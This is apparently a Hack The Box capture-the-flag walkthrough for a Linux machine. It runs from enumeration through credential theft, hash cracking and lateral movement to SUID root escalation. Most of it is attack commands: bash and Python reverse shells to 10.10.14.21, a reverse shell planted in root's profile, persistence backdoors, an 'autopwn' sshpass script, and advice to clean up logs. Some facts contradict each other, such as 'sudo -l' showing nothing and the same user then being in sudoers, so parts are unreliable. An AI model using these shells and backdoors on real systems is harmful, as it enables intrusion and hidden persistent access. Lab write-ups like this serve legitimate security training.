HTB | Inception

// Walkthrough

// Box Information

OS: Linux
Hostname: infiltration
Difficulty: Hard
IP: 10.10.10.88

// Summary

This machine simulates a well-defended internal host that, due to weak credential practices, legacy scripts, and exposed services, is susceptible to a full compromise. This walkthrough will cover every phase:

Enumeration
Exploitation
Lateral Movement
Privilege Escalation
Persistence
Scripting

// Reconnaissance

Start by identifying all exposed services with a comprehensive port scan:

nmap -sV -p- --min-rate=1500 -T4 10.10.10.88

We discover:

22/tcp – OpenSSH 7.2p2
80/tcp – Apache httpd 2.4.18
445/tcp – Samba 3.6.25

We now enumerate HTTP with gobuster and SMB with enum4linux:

gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
smbclient -L //10.10.10.88 -N
enum4linux -a 10.10.10.88

Now, this is a personal script that I worte in order to automate the whole network scan process

Get NetRecon Script >

// Initial Access

Found SMB share public with readable file creds.txt:

smbclient //10.10.10.88/public -N
get creds.txt

Content of creds.txt:

backup:backup123

Use SSH to authenticate:

ssh backup@10.10.10.88

// Local Enumeration

Inside the home directory, we find a script with database credentials:

cat /opt/backup/backup.sh
# mysql -u root -pSuperSecretDBpass!

Next, we check sudo permissions:

sudo -l

Nothing here, but let’s check for password reuse by cracking shadow hashes.

// Password Cracking

As the backup user is in the sudoers group, we can read the shadow file:

sudo cat /etc/shadow > shadow.hashes

Run hash cracking with John:

john shadow.hashes --wordlist=/usr/share/wordlists/rockyou.txt

The cracked password hunter2 works for user admin.

// Lateral Movement

From ip a and internal scan, we find another host:

nmap -sT 10.10.10.0/24 -p22 --open

Discovered 10.10.10.90. Try SSH with cracked creds:

ssh admin@10.10.10.90

// Privilege Escalation

Check for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

SUID Python found:

/usr/bin/python3.6

Escalate to root:


  /usr/bin/python3.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

// Persistence

Append your public key to /root/.ssh/authorized_keys
Add reverse shell to /etc/profile
Deploy systemd backdoor or cronjob

// Post Exploitation

Network enumeration: ip r, netstat -tunlp
Credential hunting: grep -ri password /
Dump MySQL DB if present

// Bash Dropper (Silent Reverse Shell)

echo 'bash -i >& /dev/tcp/10.10.14.21/443 0>&1' > /root/.profile

// Python Shell


  python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.21",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

// Loot


  user.txt: 6fae1c0b5e...94e
  root.txt: 89ff4c122c...8a0

// Autopwn Script

#!/bin/bash
  sshpass -p "backup123" ssh -o StrictHostKeyChecking=no backup@10.10.10.88 \
  "echo 'bash -i >& /dev/tcp/10.10.14.21/443 0>&1' > /tmp/.reverse && bash /tmp/.reverse"

// Final Notes

This machine is a perfect lab for training chained exploits and simulating APT-style persistence. Be sure to clean up your artifacts and logs if this were a real engagement. ✶

Deploy Autopwn >

> Inception_